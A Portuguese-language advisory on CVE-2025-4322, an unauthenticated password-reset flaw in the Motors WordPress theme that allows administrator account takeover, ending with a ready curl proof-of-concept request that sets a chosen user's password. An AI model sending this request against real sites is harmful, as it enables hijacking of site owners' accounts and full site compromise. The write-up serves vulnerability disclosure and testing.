
CVE-2025-4322 – Escalação de Privilégio Não Autenticada via Atualização de Senha "Account Takeover" 🔥
O tema Motors para WordPress é vulnerável a escalação de privilégio via tomada de conta em todas as versões até, e incluindo, 5.6.67. Isso se deve ao tema não validar adequadamente a identidade de um usuário antes de atualizar sua senha. Isso torna possível que atacantes não autenticados alterem senhas arbitrárias de usuários, incluindo as de administradores, e aproveitem isso para obter acesso à sua conta.
CNA: Wordfence Pontuação Base: 9.8 ⚫ CRÍTICO Vetor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
5.6.67 - Escalação de Privilégio Não Autenticado via Atualização de Senha/Tomada de Conta5.6.67O tema Motors para WordPress (até e incluindo a versão 5.6.67) contém uma falha crítica de autenticação em sua funcionalidade de redefinição de senha.
Ele fornece um mecanismo de atualização de senha no front-end através de endpoints, mas falha em validar adequadamente a identidade do usuário ou autorização antes de processar alterações de senha.
Como resultado, atacantes não autenticados podem enviar requisições HTTP maliciosas que fornecem um user_id, um hash_check arbitrário, e uma nova senha (stm_new_password) para redefinir a senha de qualquer usuário — incluindo administradores.
Se explorado, isso permite que atacantes:
Obtenham acesso administrativo,
Assumam o controle total do site,
Implantem backdoors persistentes ou plugins maliciosos.
curl "https://local.ization/loginregister/?user_id=2&hash_check=%C0" --data "stm_new_password=randomizer" -XPOST -v -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36'
Este relatório é apenas para fins educacionais e de teste de segurança autorizado. A exploração desta vulnerabilidade sem permissão pode violar limites legais e éticos.